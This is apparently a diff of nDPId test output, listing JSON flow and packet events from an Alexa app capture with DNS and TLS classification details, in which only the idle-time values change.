00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1490976195545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1490976195545,"pkt":"AMDKkaPvePiC0\/vCCABFAABIWmVAAEARM0asECrYrBAqAZ3pADUANBzi5IoBAAABAAAAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAE="} 00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2795,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195545,"flow_last_seen":1490976195545,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1490976195545,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1490976195572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195572,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqu40VdGPrBAq2AG7o2R8wwHRgIQ4WaAScSCn6AAAAgQFtAQCCApttHwsAPaKsAEDAwg="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2799,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1490976195573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195573,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0sulAAEAGqw2sECrYNFXRj6NkAbuAhDhZfMMB0oAQAVdGegAAAQEICgD2irVttHws"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2800,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195529,"flow_last_seen":1490976195574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976195574,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00911{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195529,"flow_last_seen":1490976195621,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1490976195621,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01389{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195529,"flow_last_seen":1490976195622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":568,"midstream":0,"thread_ts_msec":1490976195622,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":1490976195628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976195628,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw6\/5AAEARoYSsECoBrBAq2AA1nekAXGuw5IqBgAABAAIAAAAAB2FuZHJvaWQHY2xpZW50cwZnb29nbGUDY29tAAABAAHADAAFAAEAAAErAAwHYW5kcm9pZAFswBzAOAABAAEAAAErAATYOsJO"} 00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2810,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976195628,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.58.194.78"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} -00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} -02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195633,"flow_last_seen":1490976195633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976195633,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1490976195633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195633,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fD5AAEAGTQysECrY2DrCTr+rAbtBfvaFAAAAAKAC\/\/9RcQAAAgQFtAQCCAoA9oq7AAAAAAEDAwg="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":1490976195670,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976195670,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8ibgAADcGiJLYOsJOrBAq2AG7v6uBvvSDQX72hqASpajvAAAAAgQFZAQCCAoLBTvAAPaKuwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_packet_id":3,"flow_last_seen":1490976195672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976195672,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0fD9AAEAGTROsECrY2DrCTr+rAbtBfvaGgb70hIAQAVfBygAAAQEICgD2ir8LBTvA"} +00988{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2820,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976195633,"flow_last_seen":1490976195724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1490976195724,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01053{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2824,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976195633,"flow_last_seen":1490976195762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1490976195762,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256"}} +02117{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2826,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976195633,"flow_last_seen":1490976195763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1490976195763,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"216.58.194.78","src_port":49067,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.gcp.gvt2.com,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,g.co,goo.gl,google-analytics.com,google.com,googlecommerce.com,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com","ja3":"5bf38a5cbf896cd31eeef4d6ad1503e1","ja3s":"9b1466fd60cadccb848e09c86e284265","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google.com","fingerprint":"54:A0:1E:03:FF:CB:33:BC:9D:65:DC:D7:BF:6B:04:2B:F9:F3:D5:42"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1490976195921,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1490976195921,"pkt":"AMDKkaPvePiC0\/vCCABFAABNWmZAAEARM0CsECrYrBAqARIEADUAOVP\/iiYBAAABAAAAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAQ=="} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2861,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976195921,"flow_last_seen":1490976195921,"flow_idle_time":180000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976195921,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4612,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"images-na.ssl-images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2864,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":1490976195980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1490976195980,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC37AVAAEARoTasECoBrBAq2AA1EgQAo8CaiiaBgAABAAUAAAAACWltYWdlcy1uYRFzc2wtaW1hZ2VzLWFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAMAHg1kazlwczdnb3FvZWVmCmNsb3VkZnJvbnQDbmV0AMA9AAEAAQAAADsABDRUPnPAPQABAAEAAAA7AAQ0VD7rwD0AAQABAAAAOwAENFQ+v8A9AAEAAQAAADsABDRUPj4="} 